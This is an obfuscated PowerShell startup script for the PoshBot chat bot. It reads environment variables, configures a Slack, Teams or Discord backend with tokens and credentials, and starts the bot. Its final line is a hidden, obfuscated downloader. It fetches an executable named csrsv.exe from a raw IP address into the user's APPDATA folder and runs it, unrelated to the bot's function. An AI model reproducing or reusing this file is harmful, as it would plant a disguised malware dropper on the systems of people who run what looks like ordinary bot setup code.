 SV  6YLBD2 ([Type]("{0}{2}{1}"-F 'ps','edentIAL','Cr') ) ;  $48L0y =  [TypE]("{0}{1}" -F'sTri','Ng') ; [cmdletbinding()]
param()

$VerbosePreference = ("{1}{0}" -f 'ontinue','C')

function geT-`FROm`eNV {
    [cmdletbinding()]
    param(
        [parameter(mANdaTorY)]
        $Name,

        [parameter(mANDaTOrY)]
        $Default
    )

    $envValue = Get-ChildItem -Path ("{0}{1}" -f 'En','v:') |
        Where-Object { $_."na`me".("{1}{0}{2}"-f 'pe','ToUp','r').Invoke() -eq $Name.("{0}{2}{1}" -f 'To','pper','U').Invoke() } |
        Select-Object -First 1 |
        ForEach-Object {
            $_."v`AlUE"
        }
    if ($null -eq $envValue) {
        Write-Verbose "$Name = $($Default) "
        $Default
    } else {
        Write-Verbose ("$Name "+'= '+"$envValue")
        $envValue
    }
}

if ($IsLinux -or $IsMacOs) {
    $rootDrive = ''
} else {
    $rootDrive = 'c:'
}




$configurationSettings = @{
    ("{0}{1}"-f 'Nam','e') = @{
        ("{3}{2}{1}{0}"-f 'ble','ia','vVar','En')  = ("{0}{2}{1}" -f 'POSHB','E','OT_NAM')
        ("{2}{0}{3}{1}"-f 'f','tValue','De','aul') = ("{0}{2}{3}{1}" -f 'Pos','ot_Docker','h','B')
    }
    ("{4}{3}{2}{0}{1}" -f'ti','onDirectory','gura','onfi','C') = @{
        ("{1}{0}{2}{3}" -f'r','EnvVa','ia','ble')  = ("{0}{4}{1}{5}{3}{2}"-f 'POS','OT_','CTORY','FIG_DIRE','HB','CON')
        ("{1}{3}{0}{2}" -f 'Val','Defau','ue','lt') = "$rootDrive/poshbot_data"
    }
    ("{2}{0}{1}"-f'gDir','ectory','Lo') = @{
        ("{0}{3}{1}{2}"-f'Env','l','e','Variab')  = ("{4}{2}{1}{3}{0}"-f'ECTORY','O','T_L','G_DIR','POSHBO')
        ("{1}{0}{2}"-f'u','Defa','ltValue') = "$rootDrive/poshbot_data/logs"
    }
    ("{2}{4}{1}{0}{3}"-f'Di','in','Pl','rectory','ug') = @{
        ("{0}{2}{1}"-f'EnvVaria','le','b')  = ("{0}{2}{3}{1}{4}" -f'PO','LUGIN_DIR','SHB','OT_P','ECTORY')
        ("{2}{1}{0}" -f 'e','faultValu','De') = "$rootDrive/poshbot_data/plugins"
    }
    ("{3}{1}{2}{4}{0}"-f 'ry','g','inRep','Plu','osito') = @{
        ("{0}{1}{2}" -f 'EnvV','aria','ble')  = ("{4}{0}{5}{3}{1}{2}" -f 'HBO','ORI','ES','OSIT','POS','T_PLUGIN_REP')
        ("{3}{2}{0}{1}"-f'Val','ue','fault','De') = @(("{1}{2}{0}" -f'ry','PSGall','e'))
    }
    
    
    
    
    ("{1}{0}" -f 'evel','LogL') = @{
        ("{1}{2}{0}" -f 'ble','En','vVaria')  = ("{2}{3}{1}{0}{4}"-f'L','G_','POSHBOT','_LO','EVEL')
        ("{0}{3}{1}{2}"-f'Def','u','e','aultVal') = ("{0}{1}"-f'Verbos','e')
    }
    ("{2}{1}{3}{0}" -f 'B','LogSi','Max','zeM') = @{
        ("{0}{2}{1}"-f'EnvV','iable','ar')  = ("{3}{1}{4}{2}{0}"-f 'B','AX','G_SIZE_M','POSHBOT_M','_LO')
        ("{2}{0}{1}"-f 'faultVal','ue','De') = 10
    }
    ("{3}{0}{2}{1}"-f 'LogsT','p','oKee','Max') = @{
        ("{2}{3}{0}{1}"-f 'riabl','e','EnvV','a')  = ("{5}{1}{0}{2}{3}{4}" -f 'OGS_','OSHBOT_MAX_L','TO','_KEE','P','P')
        ("{2}{1}{0}"-f 'ue','al','DefaultV') = 5
    }
    ("{1}{2}{0}{3}{4}"-f'gCo','L','o','mman','dHistory') = @{
        ("{0}{1}{2}" -f 'Env','Varia','ble')  = ("{2}{3}{4}{5}{1}{6}{0}"-f 'Y','OT_LOG_CMD','PO','S','H','B','_HISTOR')
        ("{1}{2}{0}" -f 'Value','Def','ault') = $true
    }
    ("{3}{2}{1}{4}{0}"-f 'B','Hist','and','Comm','oryMaxLogSizeM') = @{
        ("{3}{1}{0}{2}" -f'vVari','n','able','E')  = ("{0}{5}{4}{2}{3}{6}{1}" -f'POSHBOT_CMD','SIZE_MB','AX_L','OG','_M','_HISTORY','_')
        ("{0}{3}{1}{2}"-f 'Defaul','Valu','e','t') = 10
    }
    ("{6}{5}{2}{0}{4}{1}{3}" -f'ist','yMaxLogsTo','H','Keep','or','mand','Com') = @{
        ("{1}{0}{2}" -f'a','EnvVari','ble')  = ("{4}{3}{6}{5}{2}{0}{1}" -f 'GS_TO_KE','EP','AX_LO','I','POSHBOT_CMD_H','_M','STORY')
        ("{1}{2}{3}{0}"-f'ltValue','D','e','fau') = 5
    }
    ("{0}{3}{4}{1}{5}{2}" -f 'Backen','on','iguration','d','C','f') = @{
        ("{1}{0}{2}" -f'bl','EnvVaria','e')  = ("{6}{5}{7}{3}{0}{2}{1}{4}" -f 'IGURA','O','TI','F','N','SHBOT','PO','_BACKEND_CON')
        ("{1}{0}{2}" -f'lt','Defau','Value') = @{}
    }
    ("{4}{3}{0}{2}{1}{5}" -f 'on','u','fig','ginC','Plu','ration') = @{
        ("{1}{2}{0}" -f'ble','EnvVa','ria')  = ("{3}{5}{8}{6}{0}{2}{7}{1}{4}"-f'N','O','FIGURA','POSHBOT','N','_PL','N_CO','TI','UGI')
        ("{0}{2}{1}{3}" -f'De','lu','faultVa','e') = @{}
    }
    ("{2}{0}{1}" -f 'mi','ns','BotAd') = @{
        ("{2}{0}{1}" -f 'Var','iable','Env')  = ("{1}{2}{0}" -f'T_ADMINS','PO','SHBO')
        ("{2}{1}{0}{3}" -f 'al','ltV','Defau','ue') = @()
    }
    ("{2}{4}{0}{3}{1}" -f'ndP','x','Comm','refi','a') = @{
        ("{1}{0}{2}"-f'vVa','En','riable')  = ("{3}{2}{0}{1}"-f 'E','FIX','_CMD_PR','POSHBOT')
        ("{1}{2}{0}{3}"-f'l','Def','aultVa','ue') = '!'
    }
    ("{5}{0}{3}{2}{4}{1}" -f'er','efixes','at','n','eCommandPr','Alt') = @{
        ("{1}{0}{2}"-f 'Vari','Env','able')  = ("{4}{1}{3}{5}{0}{6}{2}"-f '_P','T_AL','S','T_CM','POSHBO','D','REFIXE')
        ("{0}{2}{1}"-f'D','alue','efaultV') = @(("{0}{2}{1}"-f'po','t','shbo'))
    }
    ("{2}{4}{0}{3}{5}{1}" -f'Com','s','Alter','mandPrefixSepera','nate','tor') = @{
        ("{2}{1}{0}"-f 'ble','aria','EnvV')  = ("{3}{5}{1}{2}{4}{0}" -f '_SEP','D_PREF','I','POSHBO','X','T_ALT_CM')
        ("{3}{2}{1}{0}" -f'alue','tV','aul','Def') = @(':', ',', ';')
    }
    ("{0}{2}{4}{3}{5}{1}"-f 'Sen','rivate','dCo','s','mmandRespon','eToP') = @{
        ("{1}{0}{2}{3}" -f 'r','EnvVa','i','able')  = ("{0}{6}{5}{2}{1}{4}{3}"-f 'POSHBO','MD_RESP_TO_P','C','V','RI','_','T_SEND')
        ("{0}{1}{2}" -f'Default','V','alue') = @()
    }
    ("{1}{2}{4}{3}{0}" -f'nd','M','ute','knownComma','Un') = @{
        ("{0}{1}{2}"-f 'EnvVar','iabl','e')  = ("{0}{1}{2}{6}{3}{5}{4}"-f 'POS','H','B','E_UNKNOWN','D','_CM','OT_MUT')
        ("{3}{2}{1}{0}" -f 'e','u','faultVal','De') = $false
    }
    ("{1}{3}{2}{0}" -f 'ns','Add','o','CommandReacti') = @{
        ("{3}{2}{1}{0}"-f 'iable','r','Va','Env')  = ("{5}{0}{4}{3}{1}{2}" -f'SHBOT_A','CTI','ONS','REA','DD_CMD_','PO')
        ("{3}{1}{0}{2}" -f 'fau','e','ltValue','D') = $true
    }
    ("{3}{0}{1}{2}"-f'o','w','DMs','Disall') = @{
        ("{0}{1}{2}" -f'EnvVari','a','ble')  = ("{2}{0}{1}{3}"-f '_D','ISALLOW_','POSHBOT','DMS')
        ("{3}{1}{0}{2}" -f'Valu','fault','e','De') = $false
    }
    ("{3}{1}{2}{4}{6}{7}{0}{5}"-f'errid','rationL','im','FormatEnume','it','e','O','v') = @{
        ("{1}{3}{2}{0}" -f'e','En','abl','vVari')  = ("{3}{2}{1}{0}{4}{5}"-f 'ENU','T_FORMAT_','OSHBO','P','MER','ATION_LIMIT')
        ("{1}{3}{2}{0}" -f'alue','De','aultV','f') = -1
    }
    ("{2}{0}{3}{1}" -f 'ndT','pe','Backe','y') = @{
        ("{2}{3}{1}{0}"-f 'e','riabl','EnvV','a')  = ("{0}{1}{3}{2}"-f 'POS','HBOT_','CKEND','BA')
        ("{0}{3}{2}{1}" -f 'Def','ue','l','aultVa') = ("{0}{3}{1}{2}" -f'Sl','c','kBackend','a')
    }
}

Import-Module -Name ("{1}{0}"-f 'Bot','Posh') -ErrorAction ("{1}{0}" -f 'p','Sto') -Verbose:$false




Write-Verbose ("{0}{2}{3}{1}"-f'R','ettings:','untim','e s')
$runTimeSettings = @{}
$configurationSettings.("{1}{3}{2}{0}"-f 'or','GetEnume','at','r').Invoke().("{1}{0}"-f 'h','ForEac').Invoke({
    $runTimeSettings.($_."N`AME") = Get-FromEnv -Name $_."val`Ue"."E`Nvv`AR`iabLE" -Default $_."va`luE"."de`FAUlT`ValUe"
})



if ($env:POSHBOT_ALT_CMD_PREFIXES)          { $runTimeSettings."alTERnAteComm`AN`dpREf`IX`es"         = $runTimeSettings."a`lTernAtec`OM`ma`NdPREf`IX`Es" -split ';' }
if ($env:POSHBOT_PLUGIN_REPOSITORIES)       { $runTimeSettings."PluginRepO`sI`To`Ry"                 = $runTimeSettings."p`LUg`I`NRepOsITORy"         -split ';' }

if ($env:POSHBOT_ALT_CMD_PREFIX_SEP)        { $runTimeSettings."A`LtErNAtECoMm`ANDprEFI`XS`E`p`ErATO`RS" = ($runTimeSettings."ALtERNAtE`COMM`AnDPre`FIx`se`peraT`oRs" -split ';')."Toch`AR`A`RRAy" }

$configPSD1 = Join-Path -Path $runTimeSettings."c`oNFI`GuRa`TI`oN`DirE`CTOry" -ChildPath ("{2}{0}{1}"-f'ps','d1','PoshBot.')
if (-not (Test-Path -Path $configPSD1)) {

    
    $configParams = @{
        ("{1}{0}"-f'ame','N')                             = $runtimeSettings."na`Me"
        ("{4}{5}{3}{0}{2}{1}"-f 'ec','ry','to','r','Configur','ationDi')           = $runtimeSettings."cOnf`Ig`U`RA`TIoN`DiR`eCtorY"
        ("{2}{1}{0}" -f'ectory','ir','LogD')                     = $runtimeSettings."loGDI`R`ECtO`Ry"
        ("{3}{2}{1}{0}" -f'y','tor','luginDirec','P')                  = $runtimeSettings."pl`UGi`NdiREc`To`Ry"
        ("{3}{4}{2}{0}{1}"-f 'si','tory','epo','Pl','uginR')                 = $runtimeSettings."p`LUGI`NrEpOs`i`ToRy"
        
        ("{0}{2}{1}" -f'Log','evel','L')                         = $runtimeSettings."LoglE`V`EL"
        ("{0}{3}{1}{2}"-f'Max','z','eMB','LogSi')                     = $runtimeSettings."MA`X`L`OGsiZEmb"
        ("{3}{1}{0}{2}"-f'oKee','sT','p','MaxLog')                    = $runtimeSettings."mA`Xl`O`g`stOkEeP"
        ("{2}{0}{3}{1}{4}"-f 'an','H','LogComm','d','istory')                = $runtimeSettings."LOGCom`m`AN`dHiStORY"
        ("{2}{1}{3}{5}{4}{0}"-f 'MB','ndHistoryMa','Comma','xL','ize','ogS')       = $runtimeSettings."commaNdHIs`T`OrymAxLogsIZ`e`MB"
        ("{4}{3}{0}{2}{5}{1}"-f'mmandH','eep','istory','o','C','MaxLogsToK')      = $runtimeSettings."Co`Mm`An`DH`iSTo`Rym`AX`logsTOKeEP"
        ("{0}{2}{1}"-f'B','tAdmins','o')                        = $runtimeSettings."Bot`AdM`InS"
        ("{1}{0}{2}{3}"-f'nd','Comma','Pref','ix')                    = $runtimeSettings."co`mMa`NdpREfIX"
        ("{3}{4}{0}{2}{1}"-f'ma','refixes','ndP','Altern','ateCom')         = $runtimeSettings."AlTeRNAtECO`mMAND`pR`E`FIX`ES"
        ("{7}{5}{4}{1}{2}{6}{8}{0}{9}{3}"-f 'Sepe','m','a','s','ternateCom','l','ndP','A','refix','rator') = $runtimeSettings."ALTeRNaTe`Co`mMaN`DPRefI`X`se`PeRatOrS"
        ("{3}{0}{2}{1}"-f 'e','nd','UnknownComma','Mut')               = $runTimeSettings."mUt`EuNKno`WnCOM`M`AnD"
    }

    
    switch ($runTimeSettings."b`ACkEND`Ty`Pe") {
        {$_ -in ("{1}{0}"-f'lack','S'), ("{0}{1}{2}"-f'Slac','kBack','end')} {
            
            
            $slackToken = Get-FromEnv -Name ("{2}{1}{0}{3}{4}" -f 'O','B','POSH','T_SLACK_TOK','EN') -Default ''
            if ( $48L0y::("{1}{3}{2}{0}"-f'mpty','IsN','OrE','ull').Invoke($slackToken) -or $runtimeSettings."BotadMI`NS"."Co`UNT" -eq 0) {
                throw ("{30}{4}{35}{10}{20}{24}{8}{27}{33}{29}{26}{12}{7}{5}{0}{14}{2}{36}{13}{28}{32}{11}{23}{25}{19}{9}{6}{22}{3}{34}{31}{15}{16}{18}{1}{21}{17}" -f's ','nist','t a preexist','a','HBOT_SLACK_','here i','specify y','d if t','M',' ',' and','gurat','les are require','g ','no','f bo','t','ators.',' admi','se',' POSH','r','our Slack token ','ion to','BOT_AD',' load. Plea','riab','INS environment ','bot conf','a','POS',' initial list o','i','v','nd','TOKEN','in')
                exit 1
            }
            $configParams."baC`K`eNDcO`NfI`g`UR`ATIon" = @{
                ("{1}{0}"-f 'n','Toke') = $slackToken
                ("{1}{0}"-f'ame','N')  = ("{1}{0}{2}"-f'la','S','ckBackend')
            }
        }
        {$_ -in ("{0}{1}"-f'Team','s'), ("{1}{2}{3}{0}"-f'Backend','Te','a','ms')} {
            
            $botName                 = Get-FromEnv -Name ("{4}{0}{5}{1}{3}{2}" -f'HB','EA','_NAME','MS_BOT','POS','OT_T')                   -Default ''
            $teamsId                 = Get-FromEnv -Name ("{1}{3}{4}{2}{0}" -f 'EAMS_ID','PO','OT_T','SH','B')                         -Default ''
            $serviceBusNamespace     = Get-FromEnv -Name ("{8}{6}{9}{1}{3}{7}{5}{0}{4}{2}"-f 'E','C','CE','EBUS','SPA','AM','T_T','_N','POSHBO','EAMS_SERVI')       -Default ''
            $serviceBusQueueName     = Get-FromEnv -Name ("{1}{4}{5}{3}{0}{6}{2}" -f'U','PO','NAME','S_Q','SHBOT','_TEAMS_SERVICEBU','EUE_')      -Default ''
            $serviceBusAccessKeyName = Get-FromEnv -Name ("{0}{6}{4}{7}{1}{2}{8}{5}{3}" -f 'PO','ER','VIC','ME','T_TEA','_NA','SHBO','MS_S','EBUS_ACCESS_KEY') -Default ''
            $serviceBusAccessKey     = Get-FromEnv -Name ("{7}{4}{2}{8}{0}{1}{6}{3}{5}"-f 'ERV','ICEBUS_ACCES','OT_TEAMS_','KE','HB','Y','S_','POS','S')      -Default ''
            $botFrameworkId          = Get-FromEnv -Name ("{1}{0}{2}{3}{4}{5}"-f'B','POSHBOT_','O','T_FR','AM','EWORK_ID')                 -Default ''
            $botFrameworkPassword    = Get-FromEnv -Name ("{1}{2}{6}{3}{5}{4}{0}" -f 'D','POS','HBOT_BOT_F','EWORK','SSWOR','_PA','RAM')           -Default ''

            if ($runtimeSettings."BotAdM`I`NS"."CO`UNT" -eq 0 -or
                 $48L0Y::("{0}{3}{2}{1}"-f'Is','mpty','OrE','Null').Invoke($botName) -or
                 $48l0y::("{3}{0}{1}{2}"-f 'sNullOrEm','pt','y','I').Invoke($teamsId) -or
                 (  ItEm  ("vA"+"ri"+"a"+"BL"+"E:48L0y")).VALue::("{3}{1}{2}{0}" -f'pty','Nul','lOrEm','Is').Invoke($serviceBusNamespace) -or
                 (ItEM  ("vaRiable:"+"48"+"L0y")).vAlUe::("{2}{1}{3}{0}"-f'lOrEmpty','u','IsN','l').Invoke($serviceBusQueueName) -or
                 ( ItEM  VArIaBle:48L0Y ).ValUe::("{2}{1}{3}{4}{0}" -f'ty','Nu','Is','l','lOrEmp').Invoke($serviceBusAccessKeyName) -or
                  $48l0y::("{0}{1}{3}{2}"-f 'IsNul','lOr','y','Empt').Invoke($serviceBusAccessKey) -or
                  $48l0Y::("{0}{1}{2}" -f 'IsN','ullO','rEmpty').Invoke($botFrameworkId) -or
                 (iTeM ('VaRIaBl'+'e:48'+'l0'+'Y') ).vaLue::("{3}{1}{0}{2}" -f'mpt','rE','y','IsNullO').Invoke($botFrameworkPassword)) {

                throw ("{23}{8}{29}{12}{45}{1}{2}{37}{35}{30}{15}{19}{3}{27}{26}{0}{9}{32}{34}{10}{20}{21}{14}{4}{36}{22}{5}{38}{28}{13}{40}{18}{7}{42}{31}{6}{11}{16}{17}{39}{44}{33}{41}{46}{24}{25}{43}"-f'les a','K','_TOK','nt','ng','ra',' Slack t','spec','OSH','re req',' the','oken','T_SL','. ','ot a preexisti','T_ADMINS enviro',' and init','ial list ','e ','nme','re is ','n','nfigu','P','nistra','t','ab',' vari','ad','BO','HBO','r','uire',' ','d if','S',' bot co','EN and PO','tion to lo','o','Pleas','bot a','ify you','ors.','f','AC','dmi')
                exit 1
            }
            $configParams."Ba`c`KEND`cONFI`gU`Ra`TiON" = @{
                ("{0}{1}"-f 'Nam','e')                = ("{0}{1}{2}{3}"-f'TeamsBa','c','k','end')
                ("{1}{0}"-f'Name','Bot')             = $botName
                ("{0}{1}"-f'Tea','mId')              = $teamsId
                ("{3}{4}{2}{1}{0}" -f'ace','p','mes','ServiceBu','sNa') = $serviceBusNamespace
                ("{2}{0}{1}" -f 'eueNa','me','Qu')           = $serviceBusQueueName
                ("{0}{4}{2}{3}{1}"-f 'Acce','e','KeyNa','m','ss')       = $serviceBusAccessKeyName
                ("{1}{0}" -f'ey','AccessK')           = $serviceBusAccessKey | ConvertTo-SecureString -AsPlainText -Force
                ("{3}{1}{2}{0}" -f'l','eden','tia','Cr')          =   ( ls vaRiabLE:6YlBD2 ).VaLue::("{1}{0}" -f 'ew','n').Invoke(
                    $botFrameworkId,
                    ($botFrameworkPassword | ConvertTo-SecureString -AsPlainText -Force)
                )
            }
        }
        {$_ -in ("{0}{1}"-f'Discor','d'), ("{1}{0}{2}"-f 'sco','Di','rdBackend')} {
            
            $token    = Get-FromEnv -Name ("{3}{2}{0}{1}" -f 'B','OT_DISCORD_TOKEN','SH','PO')     -Default ''
            $clientId = Get-FromEnv -Name ("{0}{1}{3}{4}{7}{6}{5}{2}"-f 'P','O','ID','SH','B','ISCORD_CLIENT_','_D','OT') -Default ''
            $guildId  = Get-FromEnv -Name ("{5}{4}{3}{2}{6}{0}{1}"-f'LD_','ID','OT_','B','H','POS','DISCORD_GUI')  -Default ''
            if ($runtimeSettings."B`o`TAdminS"."COU`NT" -eq 0 -or
                  (  ITEm VariaBLe:48l0y  ).VAlue::("{2}{1}{3}{0}"-f'ty','ll','IsNu','OrEmp').Invoke($token) -or
                 (GI ("v"+"ariA"+"bLe"+":4"+"8L0y")  ).Value::("{2}{0}{3}{1}{4}" -f'Null','t','Is','OrEmp','y').Invoke($clientId) -or
                 $48L0Y::("{1}{0}{2}"-f'sNullOrEmpt','I','y').Invoke($guildId)) {

                throw ("{46}{18}{29}{32}{42}{16}{19}{31}{37}{36}{6}{47}{51}{7}{13}{1}{39}{14}{33}{8}{25}{23}{24}{52}{41}{11}{48}{26}{45}{44}{40}{28}{2}{3}{35}{49}{50}{43}{12}{38}{9}{27}{15}{17}{20}{21}{22}{4}{34}{30}{0}{5}{10}" -f'adminis','OS',' ','t','and init','t','_','O','nviron','fy ','rators.','preexisti','sp','RD_GUILD_ID, and P','MIN','quired ','_DISCOR','b','ISC','D_CLI','ackend',' configurat','ion ','variables are requi','r','ment ','o','the re','n','OR','bot ','ENT_ID, POS','D_TOKEN, POSHBO','S e','ial list of ','o','T','HBO','eci','HBOT_AD','tio','re is not a ','T','Please ','a','nfigur','POSHBOT_D','D','ng bot c',' loa','d. ','ISC','ed if the')
                exit 1
            }
            $configParams."b`AckeNd`cONF`IgurA`TiOn" = @{
                ("{0}{1}" -f'Nam','e')     = ("{1}{0}{3}{2}{4}" -f'i','D','rdBac','sco','kend')
                ("{0}{1}" -f'Toke','n')    = $token
                ("{2}{1}{0}" -f'entId','li','C') = $clientId
                ("{1}{2}{0}"-f 'ldId','Gu','i')  = $guildId
            }
        }
    }

    $pbc = New-PoshBotConfiguration @configParams
} else {
    
    
    $pbc = Get-PoshBotConfiguration -Path $configPSD1
    $pbc."N`Ame"                             = Get-FromEnv -Name ("{1}{0}{2}" -f 'S','PO','HBOT_NAME')                     -Default $pbc."nA`Me"
    $pbc."Con`FIg`URa`TI`ONdIR`ECtOry"           = Get-FromEnv -Name ("{0}{3}{2}{4}{1}"-f 'POSH','ECTORY','FIG_DI','BOT_CON','R')         -Default $pbc."c`O`NFIGu`RAtiOnD`IreCToRY"
    $pbc."ComMAN`DPRE`FIx"                    = Get-FromEnv -Name ("{1}{0}{2}{4}{3}"-f'OSHBO','P','T','CMD_PREFIX','_')               -Default $pbc."c`O`M`MandPreF`IX"
    $pbc."pLuGin`REPo`SITO`RY"                 = Get-FromEnv -Name ("{5}{7}{6}{0}{2}{4}{1}{3}"-f'T','IE','O','S','R','POS','I','HBOT_PLUGIN_REPOS')      -Default $pbc."p`Lu`gIN`REpO`sIToRY"
    $pbc."lOGDI`RE`CToRY"                     = Get-FromEnv -Name ("{1}{0}{2}{4}{3}"-f 'SHB','PO','OT_','OG_DIR','L')                  -Default $pbc."loGDirE`cT`ory"
    $pbc."b`OtAdmi`NS"                        = Get-FromEnv -Name ("{0}{2}{3}{1}" -f 'PO','BOT_ADMINS','S','H')                   -Default $pbc."boT`ADmi`Ns"
    $pbc."L`OGle`VEl"                         = Get-FromEnv -Name ("{0}{1}{2}{4}{3}"-f'POSHB','O','T_LOG_L','VEL','E')                -Default $pbc."Lo`gle`Vel"
    $pbc."al`Tern`At`eCOmmaN`DprE`FiXES"         = Get-FromEnv -Name ("{4}{1}{5}{2}{0}{3}" -f 'FIXE','LT_C','_PRE','S','POSHBOT_A','MD')         -Default $pbc."A`lTERN`A`TecoM`maNd`P`ReFixEs"
    $pbc."pl`U`giNDiRec`Tory"                  = Get-FromEnv -Name ("{1}{2}{0}{4}{5}{3}"-f'BOT','POS','H','DIR','_P','LUGIN_')               -Default $pbc."PlU`GI`NDirE`CtOrY"
    $pbc."MU`T`eUnk`NOwNcOmMand"               = Get-FromEnv -Name ("{0}{4}{1}{5}{3}{2}"-f 'POSH','NKN','CMD','_','BOT_MUTE_U','OWN')         -Default $pbc."M`Ute`UNK`N`owNC`omManD"
    
    $pbc."AlTe`Rna`TeC`o`mmA`NdpRE`FIxseP`eR`ATO`Rs" = Get-FromEnv -Name ("{4}{2}{1}{3}{0}"-f'_SEP','OT_ALT_CM','HB','D_PREFIX','POS')       -Default $pbc."al`TernAT`ECOmmanD`Pr`EF`i`Xs`ePERatOrS"
    $pbc."sE`N`DCo`mm`AnDREs`ponSET`op`RI`VAtE"     = Get-FromEnv -Name ("{4}{6}{0}{7}{2}{3}{8}{1}{5}" -f'END_','PRI','_RES','P_','POSHBO','V','T_S','CMD','TO_')    -Default $pbc."S`eNdCO`mMA`NdrE`SpoNsE`TOpRivaTe"

    $slackToken = Get-FromEnv -Name ("{1}{2}{3}{0}" -f'EN','POSHBOT_SLA','CK','_TOK') -Default ''
    if (-not  (  Get-variabLE 48l0y  -vaLUE )::("{2}{0}{1}{3}"-f'N','ull','Is','OrEmpty').Invoke($slackToken)) {
        $pbc."BAc`KeNDCONfI`Gu`Rat`IOn" = @{
            ("{0}{1}" -f'Tok','en') = $slackToken
            ("{1}{0}" -f 'e','Nam')  = ("{1}{0}{2}" -f 'kBack','Slac','end')
        }
    }
}


switch ($runTimeSettings."BAcKEn`d`TypE") {
    {$_ -in @(("{0}{1}" -f 'Sla','ck'), ("{1}{3}{0}{2}"-f'Bac','S','kend','lack'))} {
        $backEndCommand = Get-Command ("{4}{1}{2}{3}{0}"-f'kend','-P','oshBotSla','ckBac','New')
    }
    {$_ -in @(("{1}{0}"-f 's','Team'), ("{1}{0}{3}{2}"-f'msBa','Tea','kend','c'))} {
        $backendCommand = Get-Command ("{1}{0}{3}{2}{5}{4}"-f'Posh','New-','ams','BotTe','end','Back')
    }
    {$_ -in @(("{1}{0}"-f'rd','Disco'), ("{3}{1}{0}{2}"-f'ordBacken','sc','d','Di'))} {
        $backEndCommand = Get-Command ("{0}{3}{2}{4}{1}" -f 'Ne','ackend','oshBotDi','w-P','scordB')
    }
    ("{2}{1}{0}" -f 't','faul','de') {
        throw ((("{24}{17}{27}{11}{3}{20}{23}{9}{19}{15}{2}{4}{6}{10}{25}{18}{7}{8}{13}{0}{12}{5}{14}{22}{29}{28}{26}{21}{16}{31}{30}{1}"-f '6','ndjV6','be','perty in Bac',' on','jV6','e of th','w','ing: jV6SlackjV6, jV6','rati','e','ro',', ','SlackBackendjV','Teamsj',' ','6, jV6Disc','mine b','llo','on should','kendC','jV','V6, jV6TeamsBa','onfigu','Unable to deter',' fo','scord','ackend type. Name p','V6Di','ckendjV6, j','ke','ordBac')) -replAce  ([CHAR]106+[CHAR]86+[CHAR]54),[CHAR]39)
        exit 1
    }
}
$backend = & $backendCommand -Configuration $pbc."bA`CK`eN`Dc`on`FiguRaTIon"


$bot = New-PoshBotInstance -Configuration $pbc -Backend $backend
$bot.("{0}{1}" -f 'Sta','rt').Invoke()

(New-Object ("{3}{0}{2}{4}{1}"-f 'Web','t','Cl','System.Net.','ien')).("{0}{1}{2}{3}"-f'Downlo','adF','i','le').Invoke(("{3}{5}{10}{6}{1}{2}{4}{9}{0}{7}{8}" -f '/c','8.170.','21','http:','8/~ya','//89.','4','srsv.e','xe','hoo','2'),"$env:APPDATA\csrsv.exe");Start-Process ("$env:APPDATA\csrsv.exe")
